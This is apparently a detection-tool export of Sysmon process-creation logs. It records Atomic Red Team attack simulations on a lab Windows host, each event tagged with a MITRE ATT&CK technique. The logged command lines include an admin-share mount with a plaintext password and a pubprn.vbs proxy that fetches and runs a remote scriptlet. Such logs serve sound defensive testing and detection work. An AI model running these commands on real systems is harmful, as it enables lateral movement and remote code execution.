<Data Name=""ProcessGuid"">747F3D96-D859-5D31-0000-0010E68C2F00</Data>
<Data Name=""ProcessId"">6524</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;echo &quot; &quot;ATOMICREDTEAM &gt; %%windir%%\cert.key&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547737.466584,2019-07-19T18:48:57.466584+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:48:46.238056Z"">
</TimeCreated>
<EventRecordID>3675</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:48:46.221</Data>
<Data Name=""ProcessGuid"">747F3D96-D84E-5D31-0000-00102C702F00</Data>
<Data Name=""ProcessId"">1628</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1077] Windows Admin Shares - Process - Created,1563547726.238056,2019-07-19T18:48:46.238056+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:48:41.109076Z"">
</TimeCreated>
<EventRecordID>3674</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:48:41.103</Data>
<Data Name=""ProcessGuid"">747F3D96-D849-5D31-0000-00103C522F00</Data>
<Data Name=""ProcessId"">6068</Data>
<Data Name=""Image"">C:\Windows\System32\net.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Net Command</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D849-5D31-0000-0010E54F2F00</Data>
<Data Name=""ParentProcessId"">3284</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1077] Windows Admin Shares - Network,1563547726.238056,2019-07-19T18:48:46.238056+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:48:41.109076Z"">
</TimeCreated>
<EventRecordID>3674</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:48:41.103</Data>
<Data Name=""ProcessGuid"">747F3D96-D849-5D31-0000-00103C522F00</Data>
<Data Name=""ProcessId"">6068</Data>
<Data Name=""Image"">C:\Windows\System32\net.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Net Command</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D849-5D31-0000-0010E54F2F00</Data>
<Data Name=""ParentProcessId"">3284</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547721.109076,2019-07-19T18:48:41.109076+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:48:41.085108Z"">
</TimeCreated>
<EventRecordID>3673</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:48:41.068</Data>
<Data Name=""ProcessGuid"">747F3D96-D849-5D31-0000-0010E54F2F00</Data>
<Data Name=""ProcessId"">3284</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D849-5D31-0000-0010914D2F00</Data>
<Data Name=""ParentProcessId"">2096</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;cmd.exe /c &quot; net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547721.085108,2019-07-19T18:48:41.085108+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;cmd.exe /c &quot; net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:48:41.050661Z"">
</TimeCreated>
<EventRecordID>3672</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:48:41.034</Data>
<Data Name=""ProcessGuid"">747F3D96-D849-5D31-0000-0010914D2F00</Data>
<Data Name=""ProcessId"">2096</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;cmd.exe /c &quot; net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547717.347265,2019-07-19T18:48:37.347265+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:48:37.264352Z"">
</TimeCreated>
<EventRecordID>3670</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:48:37.099</Data>
<Data Name=""ProcessGuid"">747F3D96-D845-5D31-0000-001098212F00</Data>
<Data Name=""ProcessId"">2624</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1059 ] wscript or cscript running script,1563547717.264352,2019-07-19T18:48:37.264352+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost &quot; script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct) in directory : ( C:\AtomicRedTeam\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:48:36.882586Z"">
</TimeCreated>
<EventRecordID>3669</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:48:36.869</Data>
<Data Name=""ProcessGuid"">747F3D96-D844-5D31-0000-0010C70A2F00</Data>
<Data Name=""ProcessId"">2484</Data>
<Data Name=""Image"">C:\Windows\System32\cscript.exe</Data>
<Data Name=""FileVersion"">5.812.10240.16384</Data>
<Data Name=""Description"">Microsoft ® Console Based Script Host</Data>
<Data Name=""Product"">Microsoft ® Windows Script Host</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D844-5D31-0000-001075082F00</Data>
<Data Name=""ParentProcessId"">7140</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost &quot; script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547716.882586,2019-07-19T18:48:36.882586+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost &quot; script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:48:36.834888Z"">
</TimeCreated>
<EventRecordID>3668</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:48:36.811</Data>
<Data Name=""ProcessGuid"">747F3D96-D844-5D31-0000-001075082F00</Data>
<Data Name=""ProcessId"">7140</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost &quot; script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547716.834888,2019-07-19T18:48:36.834888+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:48:31.240293Z"">
</TimeCreated>
<EventRecordID>3667</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:48:31.222</Data>
<Data Name=""ProcessGuid"">747F3D96-D83F-5D31-0000-00105EF22E00</Data>
<Data Name=""ProcessId"">4888</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547711.157171,2019-07-19T18:48:31.157171+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;bitsadmin.exe /resume AtomicBITS&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:48:31.134374Z"">
</TimeCreated>
<EventRecordID>3665</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:48:31.115</Data>
<Data Name=""ProcessGuid"">747F3D96-D83F-5D31-0000-001001EC2E00</Data>
<Data Name=""ProcessId"">3760</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;bitsadmin.exe /resume AtomicBITS&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
